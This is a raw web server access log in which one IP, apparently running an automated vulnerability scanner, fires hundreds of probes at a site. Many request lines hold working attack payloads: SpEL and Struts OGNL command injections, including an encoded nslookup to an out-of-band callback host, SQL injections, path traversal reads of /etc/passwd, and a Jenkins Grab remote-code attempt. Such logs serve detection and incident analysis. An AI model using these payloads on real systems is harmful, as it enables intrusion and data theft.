195.164.49.69 - - [20/Oct/2024:15:12:55 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:12:56 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:12:57 +0000] GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAge3tpbnRlcmFjdHNoLXVybH19%22))) HTTP/1.1 404 1313
195.164.49.69 - - [20/Oct/2024:15:12:58 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:12:59 +0000] GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:15:13:00 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:15:13:01 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:13:02 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:15:13:14 +0000] POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:13:15 +0000] POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:13:15 +0000] POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:13:16 +0000] GET /images/logo/logo-eoffice.php HTTP/1.1 404 1110
- - - [20/Oct/2024:15:13:18 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:13:19 +0000] GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:13:20 +0000] GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:13:21 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:15:13:22 +0000] POST /getcfg.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:13:23 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:13:24 +0000] POST /_async/AsyncResponseService HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:13:25 +0000] GET /_async/favicon.ico HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:13:26 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:13:27 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:13:28 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:13:31 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:13:32 +0000] POST /webtools/control/SOAPService HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:13:33 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:34 +0000] POST /wp-login.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:13:35 +0000] GET /wp-admin/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:13:36 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:13:37 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:13:38 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:13:39 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:13:43 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:44 +0000] POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:45 +0000] GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:46 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:51 +0000] POST /cms/content/list HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:13:51 +0000] POST /geoserver/wms HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:13:52 +0000] POST /classes/Master.php?f=delete_supplier HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:13:53 +0000] POST /scgi-bin/platform.cgi HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:13:54 +0000] POST /scgi-bin/platform.cgi HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:13:55 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:13:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:13:57 +0000] GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:13:59 +0000] GET /api/v1/users HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:14:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:01 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:03 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:14:04 +0000] GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:14:04 +0000] GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:14:04 +0000] GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:14:07 +0000] GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:15:14:09 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:14:10 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:14:11 +0000] GET /wp-json/post-smtp/v1/get-log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:14:12 +0000] POST /Tool/uploadfile.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:14:13 +0000] GET /home/nwinh.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:14:14 +0000] GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:14:15 +0000] GET /login.rst HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:14:16 +0000] POST /graphql HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:14:17 +0000] GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:14:18 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:14:19 +0000] GET /api/data HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:14:20 +0000] POST /client/api?command=samlSso HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:14:21 +0000] GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:22 +0000] GET /admin/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:14:23 +0000] GET /workflow/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:14:26 +0000] GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272nht07jtaiyyx2wuknsmlghbggs%27%2C+NULL%2C+%27E9E6120F7F6B5E9B91DDD822EA4BA57A%27%2C+%272nht07jtaiyyx2wuknsmlghbggsFirstName%27%2C+%272nht07jtaiyyx2wuknsmlghbggsLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272nht07jtaiyyx2wuknsmlghbggs%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:14:27 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:14:29 +0000] GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:14:31 +0000] GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:14:32 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:14:34 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:14:37 +0000] GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:14:41 +0000] GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:14:48 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:14:49 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:14:50 +0000] POST /process/aprocess.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:14:52 +0000] POST /adminPage/remote/cmdOver HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:14:57 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:14:58 +0000] POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:14:59 +0000] GET / HTTP/1.1 200 11204
47.128.39.223 - - [20/Oct/2024:15:15:00 +0000] GET /ReplicationManager/RMLog?log=localhost_access_log.2024-10-15.txt HTTP/1.1 200 62749
195.164.49.69 - - [20/Oct/2024:15:15:16 +0000] GET /oam/server/opensso/sessionservice HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:15:17 +0000] GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:15:18 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:15:19 +0000] GET /current_config/Sha1Account1 HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:15:20 +0000] GET /cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:15:21 +0000] GET /nifi-api/process-groups/root HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:15:21 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:15:22 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:15:23 +0000] GET /services/getFile.cmd?userfile=config.xml HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:15:25 +0000] GET /dumpmdm.cmd HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:15:26 +0000] GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:15:26 +0000] GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:15:27 +0000] GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:15:29 +0000] GET /cacti/cmd_realtime.php?1+1&&id=1+1+1 HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:15:30 +0000] GET /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1'+AND+EXTRACTVALUE(22,CONCAT(0x7e,md5(877384598)))--+X HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:15:32 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:15:32 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:15:33 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:15:34 +0000] GET /' HTTP/1.1 404 1079
- - - [20/Oct/2024:15:15:36 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:15:37 +0000] GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:15:38 +0000] GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1 404 1145
195.164.49.69 - - [20/Oct/2024:15:15:39 +0000] GET /%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:15:15:40 +0000] GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:15:41 +0000] GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:15:42 +0000] GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:15:43 +0000] GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:15:44 +0000] GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1 400 1160
83.212.98.101 - - [20/Oct/2024:15:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:15:45 +0000] GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:15:15:46 +0000] GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 404 1577
195.164.49.69 - - [20/Oct/2024:15:15:48 +0000] GET /secure/ContactAdministrators!default.jspa HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:15:49 +0000] GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:15:15:50 +0000] GET /grid/console HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:15:51 +0000] GET /console HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:15:52 +0000] GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:15:53 +0000] GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:15:15:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:15:55 +0000] GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:15:56 +0000] GET /admin/elfinder/elfinder-cke.html HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:15:57 +0000] GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:15:15:58 +0000] GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:15:15:59 +0000] GET /assets/elFinder/elfinder.html HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:16:00 +0000] GET /backend/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:16:00 +0000] GET /elfinder/elfinder-cke.html HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:16:01 +0000] GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:15:16:02 +0000] GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:15:16:03 +0000] GET /uploads/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:15:16:04 +0000] GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:16:05 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:16:06 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:15:16:07 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:16:08 +0000] GET /Admin/Admin.aspx HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:16:09 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:16:10 +0000] GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1 404 1127
- - - [20/Oct/2024:15:16:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:16:12 +0000] GET /js/elfinder.min.js HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:16:13 +0000] GET /js/elFinder.version.js HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:16:14 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:15:16:15 +0000] GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:16:16 +0000] GET /lab.html?vpath=//interact.sh HTTP/1.1 404 1082
- - - [20/Oct/2024:15:16:17 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:16:18 +0000] GET /?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5(999999999),1,user()))))--+- HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:21 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [20/Oct/2024:15:16:22 +0000] POST /cgi-bin/rpc HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:16:24 +0000] POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:16:25 +0000] POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:16:33 +0000] GET /cgi-bin/test.cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:16:33 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:33 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:16:34 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:16:35 +0000] POST /webadmin/auth/verification.php HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:16:36 +0000] GET /?gf_page=upload HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:37 +0000] POST /?gf_page=upload HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:39 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:16:40 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:16:41 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:16:42 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:16:43 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:16:44 +0000] POST /filemanager/upload.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:16:45 +0000] POST /web/google_analytics.php HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:16:46 +0000] POST /ws_utc/resources/setting/options HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:16:47 +0000] POST /ws_utc/resources/setting/keystore HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:16:50 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:16:51 +0000] GET /?pum_action=tools_page_tab_system_info HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:52 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:16:53 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:16:54 +0000] POST /adxmlrpc.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:16:55 +0000] GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:15:16:56 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:16:58 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:16:59 +0000] GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1 404 1140
195.164.49.69 - - [20/Oct/2024:15:17:01 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
